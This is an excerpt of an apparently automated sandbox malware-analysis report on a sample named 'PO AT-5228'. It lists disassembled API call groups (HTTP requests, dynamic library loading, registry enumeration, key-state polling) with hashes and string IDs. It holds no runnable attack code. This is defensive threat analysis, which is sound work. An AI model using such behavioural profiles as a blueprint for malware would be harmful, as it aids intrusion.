                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 3495660284-0
                                                                                        • Opcode ID: f4dbe6b938103a31d41a0df968d4cf3c3ecc96d40c83910441fd390ad6c55fa4
                                                                                        • Instruction ID: faaa89866f0d9ab7685d56f2bcd8660d6345df3595377920af20052f34860160
                                                                                        • Opcode Fuzzy Hash: f4dbe6b938103a31d41a0df968d4cf3c3ecc96d40c83910441fd390ad6c55fa4
                                                                                        • Instruction Fuzzy Hash: 5DF05E32145251ABD7111BA4ECC9DAA7779FF85701B140466F6039A0A0DFB59801EB51
                                                                                        APIs
                                                                                          • Part of subcall function 00B7F4EA: std::exception::exception.LIBCMT ref: 00B7F51E
                                                                                          • Part of subcall function 00B7F4EA: __CxxThrowException@8.LIBCMT ref: 00B7F533
                                                                                        • __swprintf.LIBCMT ref: 00B61EA6
                                                                                        Strings
                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00B61D49
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                        • API String ID: 2125237772-557222456
                                                                                        • Opcode ID: 40ca21c109c9a512227387f1ea9e2b6c8a55d016c140009c565a083f91fbca7c
                                                                                        • Instruction ID: a1544626073b79d863028c252d13787974336e91a2121b1e71664f60b59d6cae
                                                                                        • Opcode Fuzzy Hash: 40ca21c109c9a512227387f1ea9e2b6c8a55d016c140009c565a083f91fbca7c
                                                                                        • Instruction Fuzzy Hash: 1D917D715042029FDB14EF28C896C6ABBF4EF95700F0449AEF895972A1EB75ED04CB92
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00BBB006
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00BBB115
                                                                                        • VariantClear.OLEAUT32(?), ref: 00BBB298
                                                                                          • Part of subcall function 00BA9DC5: VariantInit.OLEAUT32(00000000), ref: 00BA9E05
                                                                                          • Part of subcall function 00BA9DC5: VariantCopy.OLEAUT32(?,?), ref: 00BA9E0E
                                                                                          • Part of subcall function 00BA9DC5: VariantClear.OLEAUT32(?), ref: 00BA9E1A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                        • API String ID: 4237274167-1221869570
                                                                                        • Opcode ID: e2a6f2892c9e1664ddc25287d618bd091720491213c316a099be485f3b83d02c
                                                                                        • Instruction ID: 224a7373748b010327b9fe0e440de3cd071e534e521fb34891b301298a67828d
                                                                                        • Opcode Fuzzy Hash: e2a6f2892c9e1664ddc25287d618bd091720491213c316a099be485f3b83d02c
                                                                                        • Instruction Fuzzy Hash: B7915C706083059FCB10DF28C495DAABBF4EF89704F1448ADF89A9B361DBB1E945CB52
                                                                                        APIs
                                                                                          • Part of subcall function 00B7C6F4: _wcscpy.LIBCMT ref: 00B7C717
                                                                                        • _memset.LIBCMT ref: 00BA5438
                                                                                        • GetMenuItemInfoW.USER32(?), ref: 00BA5467
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00BA5513
                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00BA553D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                        • String ID: 0
                                                                                        • API String ID: 4152858687-4108050209
                                                                                        • Opcode ID: cdb3f74c8d226e49074b7afd59291b2efb748c649ab72f7a8392a1cdb948258c
                                                                                        • Instruction ID: b7e17f2f8f79e931d9b212e44d38047068b39abcf53b1f49e94b9aa4894757fe
                                                                                        • Opcode Fuzzy Hash: cdb3f74c8d226e49074b7afd59291b2efb748c649ab72f7a8392a1cdb948258c
                                                                                        • Instruction Fuzzy Hash: 6751037150C7019BD7249B28C8817BFB7E9EFA6750F0406A9F896D3291DBA0CE44CB52
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00BA027B
                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00BA02B1
                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00BA02C2
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00BA0344
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                        • String ID: DllGetClassObject
                                                                                        • API String ID: 753597075-1075368562
                                                                                        • Opcode ID: 2a1cddf12568eabc044c1237b05e246ee81c72791fc1c409d9fc40ed01d0f53e
                                                                                        • Instruction ID: 0ffd398393b021754daef6f770b0743d3e403448c9155f882251bdf3921f5b63
                                                                                        • Opcode Fuzzy Hash: 2a1cddf12568eabc044c1237b05e246ee81c72791fc1c409d9fc40ed01d0f53e
                                                                                        • Instruction Fuzzy Hash: 04415BB1618204EFDF05EF54C8C5B9A7BF9EF4A311F1480E9A9099F206D7B1D944CBA4
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BA5075
                                                                                        • GetMenuItemInfoW.USER32 ref: 00BA5091
                                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00BA50D7
                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C21708,00000000), ref: 00BA5120
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                        • String ID: 0
APIs
• CharLowerBuffW.USER32(?,?,?,?), ref: 00BC0587
Similarity
• API ID: BuffCharLower
• String ID: cdecl$none$stdcall$winapi
APIs
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B9B88E
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B9B8A1
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00B9B8D1
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
APIs
• _memset.LIBCMT ref: 00B6522F
• _wcscpy.LIBCMT ref: 00B65283
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B65293
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00BD3CB0
Similarity
• API ID: IconLoadNotifyShell_String_memset_wcscpy
• String ID: Line:
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BB4401
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BB4427
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00BB4457
• InternetCloseHandle.WININET(00000000), ref: 00BB449E
  • Part of subcall function 00BB5052: GetLastError.KERNEL32(?,?,00BB43CC,00000000,00000000,00000001), ref: 00BB5067
Similarity
• API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
• String ID:
APIs
  • Part of subcall function 00B7D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B7D1BA
  • Part of subcall function 00B7D17C: GetStockObject.GDI32(00000011), ref: 00B7D1CE
  • Part of subcall function 00B7D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B7D1D8
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BC915C
• LoadLibraryW.KERNEL32(?), ref: 00BC9163
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BC9178
• DestroyWindow.USER32(?), ref: 00BC9180
Similarity
• API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
• String ID: SysAnimate32
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00BA9588
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BA95B9
• GetStdHandle.KERNEL32(0000000C), ref: 00BA95CB
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00BA9605
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00BA9653
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BA9683
• GetStdHandle.KERNEL32(000000F6), ref: 00BA9694
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00BA96CE
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00BADB0A
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00BADB5E
• __swprintf.LIBCMT ref: 00BADB77
• SetErrorMode.KERNEL32(00000000,00000001,00000000,00BFDC00), ref: 00BADBB5
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
APIs
  • Part of subcall function 00B9C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B9C84A
  • Part of subcall function 00B9C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B9C85D
  • Part of subcall function 00B9C82D: GetCurrentThreadId.KERNEL32 ref: 00B9C864
  • Part of subcall function 00B9C82D: AttachThreadInput.USER32(00000000), ref: 00B9C86B
• GetFocus.USER32 ref: 00B9CA05
  • Part of subcall function 00B9C876: GetParent.USER32(?), ref: 00B9C884
• GetClassNameW.USER32(?,?,00000100), ref: 00B9CA4E
• EnumChildWindows.USER32(?,00B9CAC4), ref: 00B9CA76
• __swprintf.LIBCMT ref: 00B9CA90
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                        • String ID: %s%d
                                                                                        • API String ID: 3187004680-1110647743
                                                                                        • Opcode ID: 06db0a007c29b3d64883e8cd5e143106ef1600381332e0694cdd71ccd1d95bc4
                                                                                        • Instruction ID: f0d12b6bc4a426302111c5080dffbd5bebfa7566520ef2db0c123a8732e6a735
                                                                                        • Opcode Fuzzy Hash: 06db0a007c29b3d64883e8cd5e143106ef1600381332e0694cdd71ccd1d95bc4
                                                                                        • Instruction Fuzzy Hash: C6117FB56002096BDF11BFA48CC5FA93BA8AB44714F0080B6FA09AA196CB749945DB70
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00BC19F3
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00BC1A26
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00BC1B49
• CloseHandle.KERNEL32(?), ref: 00BC1BBF
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: d2b2e1c28314660125b76c7c04884e54f943dbef1c17f958c3a85d9be70959a9
• Instruction ID: c05c285b07016f267ec6a4dbffbc758e564e73368da6cdd7109a555e9778c451
• Opcode Fuzzy Hash: d2b2e1c28314660125b76c7c04884e54f943dbef1c17f958c3a85d9be70959a9
• Instruction Fuzzy Hash: 3E814070600214ABDF119F68C896BADBBE5EF05720F14C899F919BF382D7B5AD418B90
APIs
• VariantInit.OLEAUT32(?), ref: 00BA1CB4
• VariantClear.OLEAUT32(00000013), ref: 00BA1D26
• VariantClear.OLEAUT32(00000000), ref: 00BA1D81
• VariantClear.OLEAUT32(?), ref: 00BA1DF8
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00BA1E26
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
• Opcode ID: 3dab43a1b5c8b73ad1ae2515ec6a6c49769e33d0d395f28b1d72582f21cdbd6f
• Instruction ID: 32b88e76bc94c640c882d164766e0a4e64c06b3ada03a286230b9bc4d4dab2ce
• Opcode Fuzzy Hash: 3dab43a1b5c8b73ad1ae2515ec6a6c49769e33d0d395f28b1d72582f21cdbd6f
• Instruction Fuzzy Hash: FC5139B5A00209AFDB14CF58C880EAAB7F8FF4D314F158569E959DB341D730EA51CBA0
APIs
  • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
  • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
• LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00BC06EE
• GetProcAddress.KERNEL32(00000000,?), ref: 00BC077D
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00BC079B
• GetProcAddress.KERNEL32(00000000,?), ref: 00BC07E1
• FreeLibrary.KERNEL32(00000000,00000004), ref: 00BC07FB
  • Part of subcall function 00B7E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00BAA574,?,?,00000000,00000008), ref: 00B7E675
  • Part of subcall function 00B7E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00BAA574,?,?,00000000,00000008), ref: 00B7E699
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
• String ID:
• API String ID: 327935632-0
• Opcode ID: 41e33582636f297b7f1659f7e54c2806dc81c99934efdd0f97fa699493738e5e
• Instruction ID: 40c667a339193199949646d4266f43ff96aab9d5a1485fb9185d441194ec6262
• Opcode Fuzzy Hash: 41e33582636f297b7f1659f7e54c2806dc81c99934efdd0f97fa699493738e5e
• Instruction Fuzzy Hash: C2512875A00205DFCB04EFA8C491EADB7F5FF58310B04809AE956AB352DB74ED45CB90
APIs
  • Part of subcall function 00BC3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BC2BB5,?,?), ref: 00BC3C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BC2EEF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BC2F2E
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BC2F75
• RegCloseKey.ADVAPI32(?,?), ref: 00BC2FA1
• RegCloseKey.ADVAPI32(00000000), ref: 00BC2FAE
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 3740051246-0
• Opcode ID: 7babf5138a77cf5b60d2fff778b112f74eba72fca071c60c8b853108108209ae
• Instruction ID: 06378c782c3ce1b0a988be8de46b77ebdcd74b1ad72934375d9aa1a5f6fa6e02
• Opcode Fuzzy Hash: 7babf5138a77cf5b60d2fff778b112f74eba72fca071c60c8b853108108209ae
• Instruction Fuzzy Hash: 81515B71608208AFD704EF64C891F6ABBF9FF88304F0488ADF595972A1DB75E905CB52
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 69562106e0e1f58a1253a568c315bb36b5fac0fddedb246b18ac30c6d7bb04d1
• Instruction ID: 5f6d484c55f138b82df38c42cf480d7c04ffa9a898dba7cab3444893f3a5225c
• Opcode Fuzzy Hash: 69562106e0e1f58a1253a568c315bb36b5fac0fddedb246b18ac30c6d7bb04d1
• Instruction Fuzzy Hash: 6F41B679A00245AFC720DF68CC84FA97FE4EB29310F1502B9F95EA72E1C770AD41D690
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00BB12B4
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00BB12DD
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00BB131C
  • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
  • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00BB1341
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00BB1349
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
• Opcode ID: 63aa0a389361f6903db3206860f139552a27ff41844c1c7c6beb4d4613e14c82
• Instruction ID: 0ba1b6b82e283106eca28cd52ba11477a7b4e33fc884a6cdde457285fc28d09f
• Opcode Fuzzy Hash: 63aa0a389361f6903db3206860f139552a27ff41844c1c7c6beb4d4613e14c82
• Instruction Fuzzy Hash: 06410B35A00505DFDF01EF64C991AAEBBF9FF08310B1480A9E90AAB361DB75ED01DB55
APIs
• GetCursorPos.USER32(000000FF), ref: 00B7B64F
• ScreenToClient.USER32(00000000,000000FF), ref: 00B7B66C
• GetAsyncKeyState.USER32(00000001), ref: 00B7B691
• GetAsyncKeyState.USER32(00000002), ref: 00B7B69F
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: 0691029a1799f643bfcc0e7272c00d836cb1f128351fcd76aa557b114fec8204
• Instruction ID: 81d08ac24640d9663d051e40738990a61474b4cd4cf65daa8a6cc32843aaf7db
• Opcode Fuzzy Hash: 0691029a1799f643bfcc0e7272c00d836cb1f128351fcd76aa557b114fec8204
• Instruction Fuzzy Hash: B3415B35604119BFCF159F64C884FE9FBF4FB05324F20839AE86996290DB30A994DFA1
APIs
• GetWindowRect.USER32(?,?), ref: 00B9B369
• PostMessageW.USER32(?,00000201,00000001), ref: 00B9B413
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00B9B41B
• PostMessageW.USER32(?,00000202,00000000), ref: 00B9B429
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00B9B431
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: 592fdfa4b5db87e99072f1733e8c5f341f7abacfa41b7657c2bb76930eb53e57
• Instruction ID: 21dccd8436979630fc6dbbdb64ab5375f4e07c8ca0d5a26159f93117421ae0b6
• Opcode Fuzzy Hash: 592fdfa4b5db87e99072f1733e8c5f341f7abacfa41b7657c2bb76930eb53e57
• Instruction Fuzzy Hash: 6231DF71904259EFDF04CFA8EE8DA9E3BB5EB04315F104269F921AB2D1C7B09914DB91
APIs
• IsWindowVisible.USER32(?), ref: 00B9DBD7
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B9DBF4
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B9DC2C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B9DC52
• _wcsstr.LIBCMT ref: 00B9DC5C
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
• Opcode ID: 3dc9a70af4a64db12e2593d93140864ef6f6a6e9c792029adb4efdb82ae8f6ed
